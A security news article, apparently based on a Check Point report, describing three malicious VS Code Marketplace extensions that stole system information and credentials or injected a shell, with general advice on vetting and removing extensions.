Malicious VSCode Extention Steals User Passwords and Open Shell

The popularity of Microsoft Visual Studio Code (VS Code) has made it a prime target for malicious actors seeking to exploit unsuspecting users. In this article, we shed light on a concerning issue: the presence of malicious VS Code extensions that can compromise security. These malicious extensions can steal passwords, sensitive data, and even open a remote shell on affected systems. It is crucial to understand the risks associated with these extensions and take proactive measures to protect your data and privacy.

Cyber criminals have begun to target Microsoft's VSCode Marketplace, posting three malicious Visual Studio extensions that were downloaded 46,600 times by Windows developers.

The virus allowed threat actors to steal credentials, system information, and install a remote shell on the victim's machine, according to Check Point, whose analysts found the malicious extensions and reported them to Microsoft.

On May 4, 2023, the extensions were identified and reported, and they were later removed from the VSCode marketplace on May 14, 2023.

Any software developers who continue to use the harmful extensions must manually remove them from their computers and run a full scan to detect any remaining infection.

Malicious cases on the VSCode Marketplace

Visual Studio Code (VSC) is a source-code editor published by Microsoft and used by a significant percentage of professional software developers worldwide.

Microsoft also operates an extensions market for the IDE called the VSCode Marketplace, which offers over 50,000 add-ons that extend the application's functionality and provide more customization options.

The malicious extensions discovered by Check Point researchers are the following:

'Theme Darcula dark' – Described as "an attempt to improve Dracula colors consistency on VS Code," this extension was used to steal basic information about the developer's system, including hostname, operating system, CPU platform, total memory, and information about the CPU.

While the extension did not contain other malicious activity, it is not typical behavior associated with a theme pack.

This extension had the most circulation by far, downloaded over 45,000 times.

 

 

Darcula extension on the VSCode Marketplace (Check Point)

 

'python-vscode'– This extension was downloaded 1,384 times despite its empty description and uploader name of 'testUseracc1111' showcasing that having a good name is enough to garner some interest.

Analysis of its code showed that it is a C# shell injector that can execute code or commands on the victim's machine.

Obfuscated C# code injector (Check Point)

 

'prettiest java' – Based on the extension's name and description, it was likely created to mimic the popular 'prettier java' code formatting tool. In reality, it stole saved credentials or authentication tokens from Discord and Discord Canary, Google Chrome, Opera, Brave Browser, and Yandex Browser, which were then sent to the attackers over a Discord webhook.

The extension has had 278 installations.

Searching for local secrets (Check Point)

Check Point also found multiple suspicious extensions, which could not be characterized as malicious with certainty, but demonstrated unsafe behavior, such as fetching code from private repositories or downloading files.

Software repositories come with risk

Software repositories allowing user contributions, such as NPM and PyPi, have proven time and time again to be risky to use as they have become a popular target for threat actors.

While VSCode Marketplace is just starting to be targeted Aquasec concluded in January that it was fairly easy to upload malicious extensions to the VSCode Marketplace and presented some highly suspicious cases. However, they were not able to find any malware.

The cases discovered by Check Point demonstrate that threat actors are now actively attempting to infect Windows developers with malicious submissions, precisely like they do in other software repositories such as the NPM and PyPI.

Users of the VSCode Marketplace, and all user-supported repositories, are advised to only install extensions from trusted publishers with many downloads and community ratings, read user reviews, and always inspect the extension's source code before installing it.

The Threat Landscape

The rising number of third-party VS Code extensions has opened a door for cyber criminals to distribute malicious code. These extensions, when installed, can execute unauthorized activities on your system, posing severe risks. Hackers employ various techniques, such as disguising themselves as legitimate extensions or injecting malicious code into seemingly harmless ones. Users often fall victim to these extensions unknowingly, putting their personal and professional data at stake.

Stealing Passwords and Sensitive Data

Once a malicious VS Code extension is installed, it can silently harvest sensitive information, including passwords, authentication tokens, API keys, and other confidential data. This stolen information provides hackers with unauthorized access to user accounts, compromising not only personal data but also potentially exposing sensitive business information or financial details.

Opening Remote Shells and Unauthorized Access

In addition to data theft, malicious VS Code extensions can go a step further by granting remote access to attackers. By exploiting vulnerabilities or implementing backdoor functionality, these extensions enable cyber criminals to establish unauthorized remote shell sessions on affected systems. This allows hackers to execute arbitrary commands, gain control over the compromised machine, and potentially propagate further attacks across connected networks.

Identifying and Mitigating the Risks

To protect yourself from these malicious extensions, it is crucial to remain vigilant and take necessary precautions. Start by reviewing the reputation and credibility of extensions before installation. Stick to well-known and reputable publishers, and carefully read user reviews and ratings. Regularly update your VS Code software and installed extensions to benefit from security patches and bug fixes.

Additionally, consider employing security tools specifically designed to detect and block malicious extensions. Antivirus software, network firewalls, and intrusion detection systems can act as additional layers of defense against potential threats. Stay informed about security advisories and follow best practices recommended by trusted sources, such as Microsoft and cybersecurity experts.

Reporting and Removing Malicious Extensions

If you come across a suspicious or potentially malicious VS Code extension, it is essential to report it promptly. Microsoft provides channels to report such incidents, helping to protect other users from falling victim to the same threat. Furthermore, remove any installed extensions that raise suspicion or are identified as malicious. Regularly review your installed extensions and uninstall those that are unnecessary or unused to minimize potential security risks.

Conclusion

The presence of malicious Microsoft VS Code extensions poses significant security risks, including password theft and unauthorized remote access. By understanding these risks and adopting proactive security measures, users can better protect themselves from falling victim to such attacks. Stay cautious, verify extension credibility, and report any suspicious activity to ensure a safer experience with VS Code.